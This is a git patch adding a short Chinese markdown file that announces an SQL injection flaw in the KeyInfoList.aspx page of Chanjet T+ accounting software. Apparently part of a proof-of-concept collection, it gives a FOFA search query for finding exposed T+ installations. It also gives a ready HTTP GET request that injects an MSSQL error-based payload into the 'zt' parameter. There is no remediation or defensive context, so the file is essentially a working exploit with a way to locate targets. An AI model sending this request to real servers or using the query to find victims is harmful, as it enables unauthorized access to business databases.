From 03a551c24799a4d99f6c1f60b27fbcea305bc4f8 Mon Sep 17 00:00:00 2001 From: wy876 <139549762+wy876@users.noreply.github.com> Date: Wed, 10 Apr 2024 21:50:41 +0800 Subject: [PATCH] =?UTF-8?q?Create=20=E7=95=85=E6=8D=B7=E9=80=9ATPlus-KeyIn?= =?UTF-8?q?foList.aspx=E5=AD=98=E5=9C=A8SQL=E6=B3=A8=E5=85=A5=E6=BC=8F?= =?UTF-8?q?=E6=B4=9E.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- 畅捷通TPlus-KeyInfoList.aspx存在SQL注入漏洞.md | 16 ++++++++++++++++ 1 file changed, 16 insertions(+) create mode 100644 畅捷通TPlus-KeyInfoList.aspx存在SQL注入漏洞.md diff --git a/畅捷通TPlus-KeyInfoList.aspx存在SQL注入漏洞.md b/畅捷通TPlus-KeyInfoList.aspx存在SQL注入漏洞.md new file mode 100644 index 0000000..92495ef --- /dev/null +++ b/畅捷通TPlus-KeyInfoList.aspx存在SQL注入漏洞.md @@ -0,0 +1,16 @@ +## 畅捷通TPlus-KeyInfoList.aspx存在SQL注入漏洞 + + +## fofa +``` +app="畅捷通-TPlus" +``` + +## poc +``` +GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','1')))--+ HTTP/1.1 +Host: 127.0.0.1 +User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1) +Accept: */* +Connection: Keep-Alive +```